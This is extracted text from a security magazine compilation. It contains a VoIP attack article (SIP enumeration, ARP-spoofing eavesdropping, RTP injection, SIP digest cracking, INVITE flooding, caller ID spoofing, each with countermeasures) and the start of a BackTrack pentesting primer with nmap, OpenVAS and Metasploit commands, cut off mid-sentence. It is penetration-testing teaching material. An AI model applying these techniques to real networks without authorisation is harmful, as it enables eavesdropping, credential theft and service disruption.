SUBSCRIBE: subscribes for an Event of Notifcation from the Notifer;
NOTIFY: notify the subscriber of a new Event;
PUBLISH: publishes an event to the Server;
INFO: sends mid-session information that does not modify the session state;
REFER: asks recipient to issue SIP request (call transfer);
MESSAGE: transports instant messages using SIP;
UPDATE: modifes the state of the session without changing the state of the dialog.
THE BEST OF
22
Figure 4. Network Scanning with SVMAP
Furthermore SVMAP offers debug and verbosity options and allows scanning the SRV records for SIP on the
destination domain. SVN records are a type of DNS entry that specify information on a service available in a
domain, typically theyre used by clients who want to know the location of the service within a domain.
Figure 4 reports a scan of the entire network 192.168.101.0/24 executed by mean of SVNMAP with the
fingerprint enabled, as you can see in the picture the scan has found three SIP client devices (two softphones
ZoIPer and a X-Lite softphone, as reported in previous section) and one SIP server (Asterisk PBX, again
as reported in the previous section). Notice that devices 105 and 108 are two UACs which open UDP non
default SIP ports. This kind of scan does not use the default method REGISTER but instead use INVITE
which sends an INVITE SIP message to each client scanned, it is not a very silent method since entails one
ring on each UAC.
Since the countermeasures to avoid Information Gathering are the same as that to avoid the Extensions
Enumeration, theyll be reported in the next section.
Extensions Enumeration
Extensions Enumeration is an important VoIP attack used in order to identify the live SIP extensions.
SVNWAR is a free SIP extension line scanner and it will be used by the author in order to accomplish this
kind of attack. SVNWAR belongs again to SIPVICIOUS suite and works similar to traditional wardialers by
guessing a range of extensions or a given list of extensions. Some SVMAP capabilities are reported in the
following list:
identify extensions on PBXs and through SIP proxies;
scan for large ranges of numeric extensions;
scan for extensions using a fle containing a list of possible extension names;
use different SIP request methods for scanning since not all PBX servers behave the same;
resume previous scans.
Figure 5. Extensions Enumeration with SVWAR
Figure 5 shows a scan for user extensions from 1000 to 1500 obtained with the default Request method
(REGISTER). As you can see by the picture, the result are the user extensions registered on the PBX and
each UAC needs the authentication password in order to set up a call.
Avoid Information Gathering and Extensions Enumeration is not an easy task, you cant deny SIP
messages such as INVITE, OPTION, REGISTER, etc., since theyre essential to set up a VoIP call; you
can just think to stop this message when they are received in rapid succession. Another countermeasure
that could be taken by a network administrator is to setup a firewall on UAS by mean of Access Control
Lists (ACLs), in this way the UAS can accept just INVITE sent by devices with reliable IP address.
THE BEST OF
23
Since ACLs dont avoid ARP spoofing attack and Caller ID spoofing attack (theyll be treated in the
following sections), in order to get an harder network protection, Switches must be configured in a right
manner: all unused ports should be disabled and used ports must be configured with port-security option
in order to avoid intruder devices in the network.
Figure 6. Spoofing UAS with ARPSPOOF
Figure 7. Spoofing UAC#1 with ARPSPOOF
Eavesdropping
Eavesdropping is the act of secretly listening a VoIP conversation of others without their consent, this could
be done by mean of packet capture which is the process of intercepting and logging traffic by mean of
Network Analyzers.
As already reported in previous sections, a Network Analyzer is a computer program (such as Wireshark) or
a piece of computer hardware that can intercept and log traffic passing over a particular types of networks,
such as either an Ethernet or a Wireless. As data streams flow across the network, the sniffer captures each
packet and, if needed, decodes the packets showing the values of various fields according to the appropriate
RFC or other specifications. Packet capture can be used by attackers over VoIP networks in order to
capture SIP Requests and RTP data sent from UAC to UAS and back. In this section call Eavesdropping is
obtained by mean of a Man In the Middle (MITM) attack which means that the attacker makes independent
connections with the victims and relays messages between them, making them believe that theyre talking
directly to each other over a private connection but the entire conversation is instead controlled by the
attacker. In order to obtain MITM, the attacker can sends fake (spoofed) Address Resolution Protocol
(ARP) messages in the Local Area Network (LAN), their aim is to associate the attackers Media Access
Contro (MAC) address with the IP address of the PBX, in this way any traffic meant for that IP address to be
sent to the attacker instead, this technique is said ARP spoofing.
Figures 6 and 7 report the ARP spoofing technique executed by author by mean of ARPSPOOF tool, the
first figure reports the spoofing of the UAS (PBX) and the latter the spoofing of the UAC#1 (Linux Mint
Box). With these two commands, the attackers change its MAC address spoofing the victim MAC address
and then it sends Gratuitous ARP (GARP) message announcing to UAS and UAC#1 the change. When the
commands will be executed, the ARP cache of UAS and UAC#1 will be poisoned and all packets exchanged
by UAS and UAC#1 will pass through the attackers Linux Box, in this way the attacker can register entirely
a conversation.
Figure 8 reports a call trace obtained between UAC#1 and UAS by mean of Wireshark on the attackers
Linux Box, as you can see by the picture a SIP handshake is followed by RTP traffic. Wireshark stores its
call trace in .pcap files (since its developed by mean of a library called libpcap) and provides one capability
which permits to decode and play RTP voice packets, Figure 9 reports an example of this feature.
THE BEST OF
24
Figure 8. Man in the Middle Registration
One countermeasure adopted in order to avoid eavesdropping attack could be again obtained configuring the
network Switch in a right manner using static ARP. Since static ARP is not always possible, another way to
avoid this attack is to use UAs with platforms which refuse GARP message, for example Linux Solaris OS.
Finally the last countermeasure applied in order to avoid Eavesdropping is the voice encryption, if audio
signal is encrypted itll be impossible to read. Voice encryption can be obtained the means of Secure RTP
(SRTP) which is a standard (RFC 3711) providing encryption and authentication of RTP.
Telephone Tampering
Another attack that can be performed by mean of MITM is Telephone Tampering, it is a form of sabotage
which concern an intentional modification of carried signal in a way that would make them harmful to the
user. RTP is a media protocol which makes VoIP vulnerable to the Tampering, RTP is often sent unencrypted
and runs over an unsecure transport protocol called UDP.
Attacker can capture an RTP packet (by the means of MITM attack) and create RTP packet similar to the
original but with a greater timestamp and sequence number. In this way the attacker can trick the victim
endpoint to reject RTP messages from the legitimate endpoint in favor of the injected packets, since the original
packets appear old. As packets have a valid and unchanged SSRC (synchronization source identifier that
characterizes the current session), they are accepted as a part of original transmission. Telephone Tampering can
have very serious consequences, because caller and called party consider themselves trusted parties.
Figure 9. Wireshark Player
THE BEST OF
25
Figure 10 shows an example of the Telephone Tampering attack obtained by mean of RTPINSERTSOUND
tool, this can be used to inject a .wav file (selected by the attacker) into the RTP stream, replacing the voice
signal from one side with the signal within .wav audio file.
Figure 10. Telephone Tampering with RTPINSERTSOUND
where:
v stands for verbose output;
i eth0 interface selected;
a source IPv4 address;
A source UDP port;
b is victim IPv4 address;
B destination UDP port;
f spoof factor;
j jitter factor.
Figure 11 reports the help command belonging to another tool used by attackers in order to get a Telephone
Tampering, its called RTPMIXSOUND. A countermeasure applied in order to avoid tampering issues is
the voice encryption yet. Moreover, a VoIP/SIP firewall could be used in front of all the VoIP phones and
monitor incoming and outgoing RTP detecting audio insertion/mixing attacks.
Authentication Attacks
In the past SIP used weak authentication where password was sent in plain text, making it easy to obtain
for anyone who could get access to SIP messages. Since this authentication was insecure it was deprecated
and now, in SIP 2.0, MD5 message-digest algorithm is used for hashing the UAC password. When a UAC
wants to authenticate with a UAS, UAS generates and sends a digest challenge to the UAC. The simplest
authentication challenge that a UAS can send contains a Realm (used to identify credentials within as SIP
message, usually it is the SIP domain) and a Nonce (this is an MD5 unique string generated by the UAC
for each registration request, it is made from a time stamp and a secret phrase to ensure a limited lifetime
and it cant be used again) as reported in the following: WWW-Authenticate: Digest algorithm=MD5,
realm=asterisk, nonce=3cf75870 Once the UAC receives the digest challenge and the user enters his
credentials, the client uses the nonce to generate a digest response and sends it back to the server:
THE BEST OF
26
Authorization: Digest username=1234realm=asterisk,nonce=3cf75870, uri=sip:1000@192.168.101
.105,response=cf89107228a444c1e8b761dfb6e669e4, algorithm=MD5
The UAS will then perform the same process to arrive at its own MD5 hash and if it matches with the one
supplied by the UAC, UAS responds with 200 OK message and UAC has obtained the authentication.
Figure 11. RTPMIXSOUND help command
THE BEST OF
27
Figure 12. SIPDUMP use example
Figure 13. SIPDUMP Hash values
Even hashed passwords might not be safe enough to protect against Authentication Attacks since it is
possible to crack MD5 hash, especially when short or too simple passwords are used: an attacker could
obtain SIP authentication header with a Network Analyzer and perform a dictionary or brute-force attack.
In the following two examples of Authentication Attacks will be reported, the authors choice about the tool
is SIPCRACK (but SIPVICIOUS could be used again with a tool called SVCRACK). Before to show how to
crack a SIP authentication password, the author must introduce another tool belonging to SIPCRACK suite
called SIPDUMP. SIPDUMP purpose is to get the MD5 authentication challenge values by a SIP session
and write them into a separate file, in order to do this task it can work either in a batch modality (with a pre-
recorded .pcap file) or in a on-line modality (by mean of a MITM attack in course).
Figure 12 reports an use example of SIPDUMP, in this case the MD5 values was obtained by mean of a
trace file (.pcap) obtained by a previous MITM attack. The trace was obtained by a call between UAC#1
and UAC#2, in particular UAC#2 is calling UAC#1 (which belong to the same network device of UAS,
but it does not imply a loss of generality). How you can see by the picture, the MD5 values will be stored
in a file called hash.txt which content is reported in Figure 13. Since UAC#2 is calling UAC#1, the victim
of this Authentication Attack will be UAC#2. Now, the file called hast.txt can be used in order to crack the
authentication password by mean of SIPCRACK tool.
Lets start to develop a Dictionary Attack, it is obtained comparing the MD5 values of each password
belonging to a password list, with the MD5 value selected from the file hash.txt. Figure 14 shows an
example of this attack executed by mean of a password dictionary, called ps.txt, which contains more than
two millions of alphanumeric passwords; as you can see by the picture, the author has selected the first MD5
value belonging to the SIP INVITE Request Message and the software has correctly cracked the password in
just 2 seconds.
Figure 14. Dictionary Attack with SIPCRACK
THE BEST OF
28
Figure 15. Brute-Force Attack with SIPCRACK
Finally, lets have a look how to accomplish the latter Authentication Attack called Brute Force.
This name derives by fact that it tries every possible combination of alphanumeric characters in order to
discover the correct password. An auxiliary tool called JOHN THE RIPPER will be used in order to help us to
build the passwords. Figure 15 shows the attack, as you can see at the top of the picture the author has initially
made a FIFO PIPE called j2s and he has used this PIPE as carrier in order to pass the passwords generated
by JOHN THE RIPPER (which is generating alphanumeric password with a max length of 8 characters) to
SIPCRACK. Since SIPCRACK during the previous attack has already cracked the first MD5 value stored in
hash.txt, the target can be only the latter MD5 value belonging to the BYE Request Message. The author has
interrupted the attack for sake of briefly since this kind of attack can takes long time, hours or even days.
One countermeasure that a network administrator could take in account is to use strong passwords, but
the real only countermeasure in order to completely avoid this kind of threat is to employ a Public Key
Infrastructures between UAS and UAC.
Denial of Service (DoS) Attack
A Denial of Service (DoS) attack on VoIP network can render it useless by causing a damage to the systems
availability, it is one of the most dangerous attack since VoIP endpoints often are not equipped to protect
themselves against this attack. Generally DoS attacks sends a lot of data (invalid or broken packets) by
flooding the network to consume device resources, which could be physical (CPU usage) or logical (protocol
features exploitations) in order to overwhelm it with a lot of requests while processing those packets. At the
same time valid packets are not getting to the system, resulting in interrupted conversations and halted call
processing because VoIP uses complex protocols for communications and even small delays in processing
packets could cause serious damages in conversations. There are several different basic types of DoS attack
that occur over the IP network.
1. Flood DoS: an attacker launches a very large number of packets to a victim device which gets it busy
processing malicious packets while dropping or delaying legitimate packets. This attack can be performed in
a way of a Distributed DoS (DDoS), where multiple systems are used to generate a massive food of packets;
2. Implementation faw DoS: an attacker creates malformed packets (they could be very long or syntactically
incorrect) in order to cause the target to fail;
3. Application-level DoS: manipulate feature of the VoIP service in order to create an attack (for example,
hijacking the registration for an IP phone can cause loss of any inbound calls to that phone);
4. Platform DoS: an attacker can create DoS by targeting a critical underlying support service (for example a
fall in a network protocol implementation of the target OS).
INVITEFLOOD tool can be used to flood a target with INVITE Request Messages, it can be used against
both UAS and UAC. As long the tool keeps flooding the PBX it will prevent users from making phone calls.
Figure 16 reports an attack accomplished by the author with this tool, the number of INVITE packets was
set to 100 in order to flood the victim. While issuing the attack the victim device will be unusable since itll
THE BEST OF
29
need significantly longer time to establish a connection. Moreover you can flood the PBX with an inexistent
extension; thus making it generate a 404 not found just to keep it busy. Figure 17 reports a registration of
packets received by the victim obtained again by mean of Wireshark, you can see a lot of INVITE Request
Message was sent to the victim.
Figure 16. DoS with INVITEFLOOD
Figure 17. DoS packets registration
Figure 18. RTPFLOOD help command
Figure 19. TEARDOWN help command
RTPFLOOD is another tool used to flood a victim with UDP packets containing RTP data. In order to obtain
a successful attack using RTPFLOOD, you need to know the RTP listening port used by the victim device
(for example X-Lite softphone UDP default port is 8000). Figure 17 reports RTPFLOOD help command.
THE BEST OF
30
TEARDOWN is a tool used to terminate a call by sending a Bye Request Message, before using
TEARDOWN you must to capture a valid SIP OK Response Message in order to use it From and To
tags and a valid caller ID value. Figure 18 reports the help command that belongs to TEARDOWN.
In order to avoid DoS attacks, a network administrator can include a logical network partitioning called
Voice VLAN. The basic concept behind Voice VLAN is that you can to dedicate a separate VLAN with a
separate subnet for Voice traffic, this keeps contention between data and voice to a minimum and is easier
to manage. Another solution could be a stateful firewalls with application inspection capabilities, policy
enforcement to limit flooded packets, and out-of-band management in order to permit to the network
administrator to reply to the network events at the attack moment by mean of a network monitoring.
Spoofing Caller ID
The caller ID is fairly easy to spoof in SIP, you just need to change the SIP INVITE Request Message from
header. In order to spoofing the caller ID several tool can be used, for example SVWAR, a tool already
used in a previous section and belonging to SIPVICIOUS suite. The authors choice for this attack is again
INVITEFLOOD, but in this example it is not used in order to flood the VoIP phone but to fake the Caller
ID. Figure 20 shows this kind of attack, as you can see by the picture INVITEFLOOD sends one INVITE
Request Message to the victim in order to spoof a Caller ID (-a spoofed) and making the victim phone
rings. Figure 21 reports the caller ID spoofed displayed as the Incoming Call by X-Lite.
Figure 20. Caller ID spoofing with INVITEFLOOD
Figure 22 shows finally the Message Header of the packet captured by Wireshark, as you can see spoofed
is the fake Caller ID reported in the Message Header and in this way the wrong information hides original
caller information and might mislead the receiver.
Figure 21. X-Lite rings displaying a spoofed ID
THE BEST OF
31
Figure 22. Spoofed SIP INVITE
The only countermeasures that are effective involve authentication of the sender and/or the From: header.
When coupled with the use of Public Key Infrastructures between UAS and UAC, digest authentication can
be used securely to authenticate the UAC. This approach enhances authentication, but only provides hop-by-
hop security, and it breaks down if any participating proxy does not support Public Key Infrastructures and/
or cannot be trusted.
Conclusions
The aim of this article was developing a reliable VoIP hacking methodology overview that could be
used against a VoIP network. Attack vectors including Information Gathering, Extensions Enumeration,
Eavesdropping, Telephone Tampering, Authentication Attacks, Denial of Service, Identity Spoofing
are re-ported and explained by mean of real examples accomplished by embedded tools. Moreover, the
countermeasures reported in this article should be used by system administrators, penetration tester or
network engineers to mitigate possible security threats.
On the Web
http://www.ietf.org/rfc/rfc3550.txt RTP Request For Comment
http://www.ietf.org/rfc/rfc3261.txt SIP Request for Comment
https://www.ietf.org/rfc/rfc3711.txt SRTP Request for Comment
http://www.asterisk.org/ Asterisk PBX website
http://www.x-lite.it/ X-Lite SoftPhone website
http://www.zoiper.com/ Zoiper website
http://www.wireshark.org/ Wireshark website
http://blog.sipvicious.org/ SIPvicious Blog
http://www.openwall.com/john/ John The Ripper web page
About the Author
Mirko Raimondi obtained his Masters degree in Computer Science from the University
of Milan Computer Science Department. He worked as a Software Engineer at
ITALTEL an Italian leader company in telecommunications industry where he was
being the project leader of Netmatch-S Lite Edition, a VoIP Session Border Controller
based on the virtual platform and running on commercial hardware. In test plant of
ITALTEL he realized testing scenarios by mean of Cisco L2/L3 devices and he has a
CCNA-security in course. Currently, he works in automotive industry, where he has
realized an audio/video/meta-data multiplexer in order to hide GPS data in mov _les. Hes interested in
VoIP telecommunications, network security, steganography methods and computer forensics. You can
contact him either through LinkedIn: http://it.linkedin.com/pub/mirko-raimondi/14/182/58a or via
e-mail: web.mirk@gmail.com.
May 27-30, 2014
Sheraton Boston
Get the best real-world Android
developer training anywhere!
Choose from more than 75 classes and in-depth tutorials
Network with speakers and other Android developers
Check out more than 40 exhibiting companies
Take your Android development skills
to the next level!















#AnDevCon
A BZ Media Event
AnDevCon

is a trademark of BZ Media LLC. Android

is a trademark of Google Inc. Googles Android Robot is used under terms of the Creative Commons 3.0 Attribution License.
Register Early and Save at www.AnDevCon.com
Find out why you should go
to AnDevCon! Watch the videos
at www.AnDevCon.com
Register Early
and SAVE!
THE BEST OF
33
A Crash Course in Pentesting with
Backtrack
by Nick Hensley
In this article, we will give you a crash course in pentesting. This article is meant to be a
basis or primer if you wish; it will teach you what a penetration test is and what it is not. We
will show you the basic steps that go into virtually all penetration tests. And teach you what
you need to be aware of, what to look for, and how to get started. That being said, this is not
a how to hack article that will teach you how to break into some unsuspecting companys
website and further penetrate their internal infrastructure.
There are many that consider obtaining Domain Admin as the ultimate goal. And yes, it is definitely a cool
thing to do, BUT its not the only thing that one should try and accomplish when performing a penetration
test. Within most companies there exist a large number of systems and devices that are not members of the
Domain. There are many vectors and avenues of attack that malicious individuals will use in order to gain
access to your network, some of these include using SQL injection techniques on your companys main
website, probing for misconfigured applications and services, brute-forcing, utilizing default username/
password combinations, and Social Engineering to name a few.
What most attackers are going to do is look for the low hanging fruit which can really run the gambit from
the before mentioned default username/password combination to unpatched servers with common exploits.
I think it was on my very first pentest (long before Metasploit was ever dreamed up) when I asked my
mentor where do I start and he replied find the oldest thing you can on the network and go after it.
That being said, what is it that your company or client wants to receive out of the pentest? Thats actually the
second question I ask clients when initially engaging with them prior to beginning a test. But the real answer
is that they want an actionable report! What the client needs is a report showing what you did, how you were
able to accomplish the exploitation, and remediation information. During a test you will often be able to
exploit one system, which may lead to another system and then to another entirely different subnet.
The most important thing that you need before you begin a penetration test is a signed agreement between
you and the client outlining the scope, time frame, and most importantly, the signature of a person who has
the AUTHORITY to give you permission to attack their network.
And dont forget that if anything happens during a penetration test thats even IT related at all, someone is
going to come looking for you or your phone is going to start ringing. Ive even received calls with someone
asking What are you doing? because some server crashed even before I had fired up my laptop for the
day! Penetration testing can create a lot of network traffic and the pentester being the wild card will catch the
blame, so timing the pentest can be critical.
Dening the Scope of the test and getting
Permission
I use a form when I engage with clients. The form explains the methodology Ill be using and has places
where they can fill in information specifying what they want tested and what they dont want tested
along with special attention targets and check boxes for some items. Speaking of methodology, if you are
new to penetration testing or thinking about getting into it, I would recommend checking out the Open
Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project
(OWASP) which can be found at the their respective links:
THE BEST OF
34
OSSTMM: http://www.isecom.org/research/osstmm.html
OWASP: https://www.owasp.org/index.php/OWASP_Testing_Project
Note
OWASP is actually in the process of updating to v4 and have a draft available on their site.
Your agreement will no doubt look differently than ones I have used, and will be living document and will
change over time. At a minimum I would suggest including the following in any agreement between you and
your client:
Start and End Date
Times the Testing can take place
List of internal contacts
Your contact information
List of Targets
Special Attention Targets
Targets to Exclude
Type of Testing to be Performed along with the Depth of the Engagement
If they want you to Perform Denial of Service Attacks a space to justify it
A Disclaimer about the Possibility of Bringing Down a System(s) or Service(s)
A place for them to release you from damages that may occur
Signature of the Approver and his/her Title
Often when first engaged with clients they wont have any idea what their options are and in some cases what
they even want tested. So I will explain to them what I can do, describe different attack vectors and avenues a
malicious person can and will use to try and gain access to their infrastructure. This can take some time and will
usually be very back-and-forth between you and your client. Both sides asking and answering questions.
The First real question I ask is What is your primary concern, that is what you are most concerned with,
or where do you think you have the most risk? Their answer to this question will help you to guide
them throughout the rest of the conversation. Some clients may have just had a breach from the outside,
others may have installed some new piece of network hardware and noticed they have a lot of outbound
connections to countries their employees should have no business need to access, and yet others with only a
test to satisfy compliance. Depending on their answer, I will usually make a recommendation and have them
agree that my recommendation is indeed what they are asking/looking for. Sometimes it will depend on what
they have had tested in the past. If its a new client, or one that hasnt had a true penetration test in a while, I
will suggest that the test basically utilize a three pronged approach, and recommend at a minimum the testing
be performed, by focusing on the external (from the Internet), internal (user space and server), and web
applications (both Internet accessible and internal).
At times I will have clients say something like Well, were not really worried about internal, this when I
explain to them about what happens when someone spoofs an email from CEO and sends a malicious PDF
file to their Domain Admin that creates an outbound connection to the attackers laptop, and that the attacker
will then have a direct tunnel into their internal network, and ask what happens if he installs a key-logger on
that admins machine?
THE BEST OF
35
Again the main point here is that the conversation will go back-and-forth and sometimes may involve multiple
conference calls with different people before they decide on what they want tested, and you may have to
explain and give examples about what the attacker is capable of. At the end of the day you are working for the
client, and will want to provide them with the best course of action given their specific needs. The ultimate goal
is to agree upon what is to be done, and have the appropriate person sign off on what you are about to do.
Preparing your Attack Platform
Assuming you now have the legal authority to perform a penetration test against someones network you will
need the proper tools!
For the rest of this article I will talk about some of the most common tools that nearly every penetration
tester uses. I may not go into detail on all of these due to scope, but this section should get you set up, and
give you the basics as well as point you to some things that you can follow up on. However, everything I am
about to show you, one should be able to replicate on their own personal home network. For that reason I
will try and focus strictly on free and open source tools.
As most corporate infrastructures are a heterogeneous mix of network devices and operating systems all
running different services and at different patch levels, I recommend using at least two different operating
systems. Your first operating system should be a Windows OS, and your second a Linux distribution.
When anybody asks me about how they should set up their attack platform, I usually recommend running
these on the same machine. Using a Windows OS (Im partial to Windows 7 Pro 64-bit) as their main install,
and then running a Linux VM. Over the years there have been many Linux-based distributions released;
some made for graphic artists, video editing, and penetration testing. The main distro that you will see many
penetration testers using and you will easily be able to find the most information on is BackTrack, and thats
what we will be using.
BackTracks website www.backtrack-linux.org defines their distro as BackTrack is a Linux-based penetration
testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment
dedicated to hacking. Regardless if youre making BackTrack you Install BackTrack, boot it from a Live DVD or
thumb drive, the penetration distribution has been customized down to every package, kernel configuration, script
and patch solely for the purpose of the penetration tester.
Figure 1.Backtrack_download
THE BEST OF
36
Installing Backtrack
Ill start out by assuming you have a Windows machine. First thing you will need is a way to run the BackTrack
VM. If you dont already have it head over to VMwares website and download vmplayer; its free for personal
non-commercial use http://www.vmware.com/products/player/. Vmplayers installation is very straight forward
so I wont cover that here. Next you need to download the BackTrack VM from http://www.backtrack-linux.
org/downloads/ as there are many different versions and options you can pick when downloading just make
sure you set your options as follows we will be downloading the latest BackTrack 5 R3: Figure 1.
BackTrack decided to use 7zip to compress their file, so if you have an issue extracting the archive you can
download 7zip from http://www.7-zip.org/ and use it to extract the vm. Once you have everything downloaded,
installed, and extracted. Go ahead and launch VMWare Player. The First thing you will need to do before you
Play the BackTrack VM is to change a setting or two. Click on Edit virtual machine settings on the right select
Network Adapter and then on the left, Change the Network Adapter Connection type from NAT to Bridged
and click the Save button so that it looks like this: Figure 2.
Figure 2. Bridged
Note
The BackTrack virtual machine comes set for 768M of RAM Depending on the total amount of RAM you
have available to your system you may want to increase that!
Now go ahead and start the BackTrack virtual machine by clicking on Play virtual machine. The first time
you start up any virtual machine you have downloaded or moved from machine to machine VMWare Player
will ask you a question, select the I copied it button (Figure 3).
Figure 3. I copied it
THE BEST OF
37
When the VM first starts up, if you have any USB or other devices connected it will give will prompt you
with another message, letting you know that you can connect those devices to the virtual machine you do
not want to do that here.
Once the BackTrack VM has finished booting you will see a login prompt like this: Figure 4. The default
login is root and the password is toor.
Figure 4. Login
Once you are at the prompt, go ahead and make sure you have an IP address by typing:
ifconfig
You should see that your DHCP server has handed you an IP address on your local network, if you see
something other than the right subnet for your network, you need to go back and check that you are running
in Bridged mode and not NAT. While things will work with a NATted IP address, if you are trying to exploit
a machine on a real subnet you will have to make changes to your host to pass the traffic back-and-forth.
The output from the ifconfig command should look like this: Figure 5. Next start up the windows manager
with the command:
startx
Figure 5. Ifconfig command output
Then launch the Terminal application by clicking on the icon at the top left of the screen that looks like a
little black box with >_ inside of it (Figure 6).
Figure 6. Metasploit registration
This next step will take a while, but we will make sure everything is up to date and we want to install the
new version of Metasploit so issue the following commands when asked if you want to uninstall Metasploit
click the Yes button: Listing 1.
THE BEST OF
38
Listing 1. Uninstall Metasploit
cd /opt/metasploit
./uninstall
apt-get update
apt-get upgrade -y
cd ~
http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.runwget
chmod +x metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run --prefix /opt/metasploit --mode unattended
nmap --script-updatedb
With the new version of Metasploit you will need to register in order to get updates.
If you want to register open up a browser and go to https://localhost:3790.
You will see the following screen (Figure 7) click the GET PRODUCT KEY button (Figure 8).
Figure 7. Metasploit registration
Figure 8. Getting the Product Key
Next pick which version you want Pro or Community (I recommend the Community edition otherwise Pro
will only work for 7 days) then type in all your information to get your free license key! (Figure 9)
THE BEST OF
39
Figure 9. Free Licence Key
Note
BackTrack comes with a lot of plugins for Firefox, you may need to disable these in order to register!
After you have filled out their form click on the GET FREE LICENSE button.
Once you have registered in order to update Metasploit, at the command prompt type:
msfupdate
Host Discovery and Enumeration
Now we are ready to identify live hosts on our test/home network. As you saw earlier, our IP was
192.168.1.115. So that means our home subnet will be 192.168.1.0/24 and for this we will be using Nmap.
Nmap
Nmap (or Network Mapper) is a security scanner that provides many features for probing computer
networks, such as host discovery, service detection, operating system fingerprinting, and a whole lot more.
Nmap is very powerful and has a ton of options you can read more about it here http://nmap.org, and all its
various options. A full reference of all the switches for Nmap can be found here http://nmap.org/book/man.
html. But I will be showing a few Nmap commands that will help ease your way.
The first command we are going to run will let us get a list of all the live hosts on our network and output
those to a file. You could skip this step and simply run the next Nmap command but it will take a whole
lot longer! We also want to exclude our Attack Platform so you will need to know the IP address of your
BackTrack virtual machine along with the IP of your Windows host OS (and any other hosts you dont want
to scan). When the command completes you will have a live_hosts.txt file but lets check it to see what hosts
you found on your network (Figure 10).
nmap -sn -T5 192.168.1.0/24
--exclude 192.168.1.1,192.168.1.115,192.168.1.117
|grep Nmap scan|cut -d -f5 >live_hosts.txt
cat live_hosts.txt
THE BEST OF
40
Figure 10. Nmap hosts
Now we have a nice list of all the hosts on our network that are live. We need to scan all these hosts, enumerate
the ports, check services and versions, and run some of the built in Nmap scripts which will give us a good idea
of what were up against. If youre curious about all these options you can simply type nmap at the command
prompt and it will tell you what each option does.
nmap -vv -Pn -sS -p1-65535 -sV -sC
--script-args=unsafe=1 -O -iL live_hosts.txt -oA my_subnet
Note
I added the --script-args=unsafe=1 option (you didnt use to have to do this, but with the newer versions of
Nmap you miss quite a bit of exploitable goodness. If you are unsure, you can leave that option out).
Once Nmap fires off, you should see something that looks like this appear in your terminal: Figure 11.
Figure 11. Nmap terminal
THE BEST OF
41
Vulnerability Scanning
Next up you will need to identify if any of these hosts contain vulnerabilities. Vulnerability Scanners are
another class of tool that any pentester will be able to use to quickly identify hosts which may be vulnerable
to exploitation. Usually I would start with a vulnerability scanner like Nessus or Core Impact, and then run
an Nmap scan. But for the workflow here and wanting to give you the ability to use BackTrack using only
free tools so that you can replicate this in your test or home environment; we will be using OpenVAS.
Nessus
Nessus does have a free for home use license and while I suggest you install it and give it a try, it is limited
to the number of IP addresses that you can scan. The Full version basically has no limitations and for the
price cant be beat. Nessus can be found at Tenables website and can be downloaded here http://www.
tenable.com/products/nessus. Nessus currently has over 50,000 checks for vulnerabilities and you can also
add in credentials (if known) for an even deeper analysis.
OpenVAS
There are a few open source free vulnerability scanners out there, among them are OpenVAS which can be
found at http://www.openvas.org/. OpenVAS currently has over 30,000 checks, so you get what you pay
for. Another reason we are talking about OpenVAS is because it comes installed on BackTrack. But it does
require a few steps in order to get it up and running.
So lets get OpenVAS setup and configured, some of these commands will require user input for instance the
setup of the SSL certificate (but you can just hit enter on all the prompts), and when creating the Amin user
you will be asked to input a password (Listing 2).
Listing 2. OpenVAS
cd /pentest/misc/openvas
openvas-mkcert
openvas-mkcert-client -n om -i
openvasad -c add_user -n admin -r Admin
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392
Now that you have configured OpenVAS open your
browser (Firefox) and surf over to 127.0.0.1:9392
and you will see the default login screen, go ahead
and enter admin for the Username we created
above and the Password you typed in. The default
login screen will look like this (Figure 12).
Figure 12. Openvas login
THE BEST OF
42
Once you login you will see the main page which looks like this (Figure 13).
Figure 13. Openvas Main Page
On the left hand menu click on Target and add your subnet then click Create Target (Figure 14).
Figure 14. Create Target
Next click on New Task and pick a name for your task, select the targets mine which we just created from
the drop down list and select the Scan Config you wish to use, we will use Full and Fast then click the
Create Task button and you should see that it was setup correctly (Figure 15).
Figure 15. Tasks
Then click the triangle Play Button icon (if you mouse over it, it will say Start Task) on the right hand side,
your scan will begin (warning this can take a long time) once the scan has finished the status will show as
Done. Also be aware that when you begin to run your scan that it can take a long time, so be patient, you
may not see the status bar update for a while. OpenVAS is very processor and memory heavy (Figure 16).
THE BEST OF
43
Figure 16. Start Task
Click on the magnifying glass icon to view the details of your report (Figure 17).
Figure 17. See the details
On the next screen click on the magnifying glass icon again for the details of your scan if you scroll down, you will
see the vulnerabilities that were identified for each host (in this example MS09-001) you can then check Metasploit
using the search function for any Modules relating to this vulnerability (Figure 18).
Figure 18. Vulnerability check
Metasploit
The Metasploit Project was created by HD Moore and is a project which provides information about security
vulnerabilities and aids penetration testing, its best-known for its open-source Metasploit Framework which is
a tool for developing and executing exploit code. When your Nmap scan has completed, lets go ahead and load
the data into Metasploit. We will first launch Metasploit, then create and connect to a new workspace to work
with, load the Nmap scan results and verify things completed with the hosts command (Listing 3 and Figure 19).
THE BEST OF
44
Listing 3. Hosts command
msfconsole
workspace -a my_network
workspace my_network
db_import /root/my_subnet.xml
hosts
Figure 19. Hosts_load
Note
If at any time you need help in Metasploit you can issue the help command, also each command usually will
take the -h option, for example, hosts -h.
A shortcut to running Nessus from the command line, is to actually run it from within Metasploit itself;
however, I like to run Nessus from the command line with the -oA switch which will Output in the three
major formats at once. This can be incredibly useful if you need to grep through the Nmap output or
otherwise sort through the output and use that information with other tools. You can, however, issue all the
same commands from within Metasploit at the command prompt you simply type db_nmap instead of nmap
from the command line, which we just finished.
Metasploit has a LOT of different auxiliary modules and tons of commands, but for this article we obviously
cant cover them all. We will however hit on some of the major commands and give you an understanding
of how to use the tool and some of the most common things you will be doing inside the Metesploit console.
With that in mind lets take a look at what services were found with Nmap that we have imported.
services
As you can see, Nmap did a really good job of identifying the open ports and what services and versions are
running on those ports (Figure 20).
Figure 20. Services
THE BEST OF
45
Lets take a look at the open services on just one of these hosts, for example, we will use 192.168.1.197
(Figure 21).
services 192.168.1.197
Figure 21. Services_ip
Notice that port 445 was open on this host. Additionally it was open on 3 other hosts so we can use one of
Metasploits many auxiliary scripts to perform some more scanning and enumeration. The show options
command will list out all module options for the currently loaded module (and payload) in order for a
module to run successfully you must complete all required fields marked by yes. In this example the
